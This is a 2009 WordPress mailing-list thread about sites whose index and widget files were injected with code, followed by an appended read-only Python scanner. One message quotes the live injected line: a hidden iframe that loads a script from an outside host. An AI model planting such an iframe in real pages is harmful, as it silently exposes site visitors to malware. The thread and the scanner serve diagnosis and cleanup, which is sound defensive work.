[wp-testers] Default.widgets.php Hacked? What to do?

Chris Carter carter.chris at gmail.com
Thu Jul 23 22:22:32 UTC 2009


you might be in trouble...

On Thu, Jul 23, 2009 at 5:08 PM, Kirk M <kmb42vt at gmail.com> wrote:

> Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my
> sites for awhile rather than Windows at least until I get everything changed
> around and my Windows partition fully scanned. I have several FTP accounts
> configured, many are for other site owners who ask me to maintain their WP
> powered sites. It definitely wouldn't do to have those get hacked.
>
>
> On 07/23/2009 05:50 PM, Chris Carter wrote:
>
>> Change your pwds and scan away..  I used cpanel file manager for a while to
>> make sure they stopped attacking .. looking at logs, it hits and is tagged
>> with googlebot, but the IPs are strange
>>
>> Anyway, This virus looks for files with:
>>
>> index*.*
>> default*.*
>> main*.*
>> home*.*
>>
>> (I built a static php includes site, and only files named like the above
>> were affected)
>>
>> Also might want to check your CGI-BIN for files that look suspicious
>>
>> It's basically a bot that logs in, finds any files in all directories
>> that start with the above
>>
>> ...funny thing was that sometimes where they inject it, PHP code throws
>> errors. They need to revise their bot to work outside the <? tags :)
>>
>> -Chris
>> 314media.com
>>
>> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh <navjotjsingh at gmail.com> wrote:
>>
>>> Yeah..my Wordpress mu install also got hacked. Just confirmed.
>>>
>>> On Fri, Jul 24, 2009 at 2:48 AM, dinu <hello at offlineblog.net> wrote:
>>>
>>>> I had to restore from backup. the entire blog
>>>> when I first saw Default.widgets.php hacked, I tried restoring only that
>>>> page. But then I found hidden iframe codes on all of my pages (including
>>>> pages after login)
>>>>
>>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I
>>>> would think it's not a wordpress issue.
>>>>
>>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh <navjotjsingh at gmail.com> wrote:
>>>>
>>>>> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>>>>>
>>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbar <josh2007 at findingjesustoday.com> wrote:
>>>>>
>>>>>> What version of wordpress are you running?
>>>>>>
>>>>>> --------------------------------------------------
>>>>>> From: "Chris Carter" <carter.chris at gmail.com>
>>>>>> Sent: Thursday, July 23, 2009 3:43 PM
>>>>>> To: <wp-testers at lists.automattic.com>
>>>>>> Cc: <wp-testers at lists.automattic.com>; <wp-hackers at lists.automattic.com>
>>>>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>>>>>>
>>>>>>> I keep getting hacked with that code inserted into admin/default-filters
>>>>>>>
>>>>>>> Chris Carter
>>>>>>> President
>>>>>>> 314media.com
>>>>>>> 314-714-5448
>>>>>>>
>>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh <navjotjsingh at gmail.com> wrote:
>>>>>>>
>>>>>>>> I have a blog running on 2.8.2 and suddenly now I find all index.php
>>>>>>>> and wp-includes/Default.widgets.php hacked with following code
>>>>>>>> inserted randomly :
>>>>>>>>
>>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>>>>>>>> height=125 style="visibility: hidden"></iframe>
>>>>>>>>
>>>>>>>> How to prevent further hacking? I am currently replacing all the files
>>>>>>>> affected since all of them affected at a certain date. I am on a
>>>>>>>> shared hosting and only one blog got attacked.
>>>>>>>>
>>>>>>>> Regards
>>>>>>>> Navjot Singh
>>>>>>>> _______________________________________________
>>>>>>>> wp-testers mailing list
>>>>>>>> wp-testers at lists.automattic.com
>>>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>>>>
>>>> --
>>>> With Love
>>>> Dinu
>>>>
>>>> http://chromestory.com
>>>> http://offlineblog.net
>
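
A read-only check for the pattern reported in this thread, added here as an example and not code from any poster or from WordPress: it walks a web root and flags hidden iframe tags, first only in files whose names match the patterns Chris lists, then in every file (Dinu reports finding the iframe on all pages). The function names, the `HIDDEN_RE` heuristic and the `example.invalid` sample URL are assumptions made for the example.

```python
import fnmatch
import re
import tempfile
from pathlib import Path

# Filename patterns the thread reports the bot rewriting (matched case-insensitively).
TARGET_PATTERNS = ("index*.*", "default*.*", "main*.*", "home*.*")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Assumption: "hidden" means the inline style from the thread, or display:none.
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

def is_targeted(filename):
    return any(fnmatch.fnmatchcase(filename.lower(), p) for p in TARGET_PATTERNS)

def find_hidden_iframes(text):
    """Return (line_number, tag) for every iframe tag styled to be invisible."""
    return [(text.count("\n", 0, m.start()) + 1, m.group(0))
            for m in IFRAME_RE.finditer(text) if HIDDEN_RE.search(m.group(0))]

def scan_tree(root, targeted_only=True):
    """Map relative path -> hits for each file under root holding a hidden iframe."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or (targeted_only and not is_targeted(path.name)):
            continue
        hits = find_hidden_iframes(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Scan a constructed sample tree: first targeted names only, then every file."""
    injected = ('<iframe src="http://example.invalid/x" width=125\n'
                'height=125 style="visibility: hidden"></iframe>')
    samples = {  # constructed sample files, not taken from a real site
        "index.php": "<?php echo 'hi'; ?>\n" + injected,
        "wp-includes/Default.widgets.php": "<?php // widgets ?>\n" + injected,
        "about.php": "<p>about</p>\n" + injected,
        "main.html": '<iframe src="/map" width="400"></iframe>',  # visible, benign
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root), scan_tree(root, targeted_only=False)

if __name__ == "__main__":
    for label, found in zip(("targeted names", "all files"), demo()):
        print(label, sorted(found))
```

Run `scan_tree()` against a downloaded copy of the site or a backup so the result can be compared with known-clean files before anything is restored.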

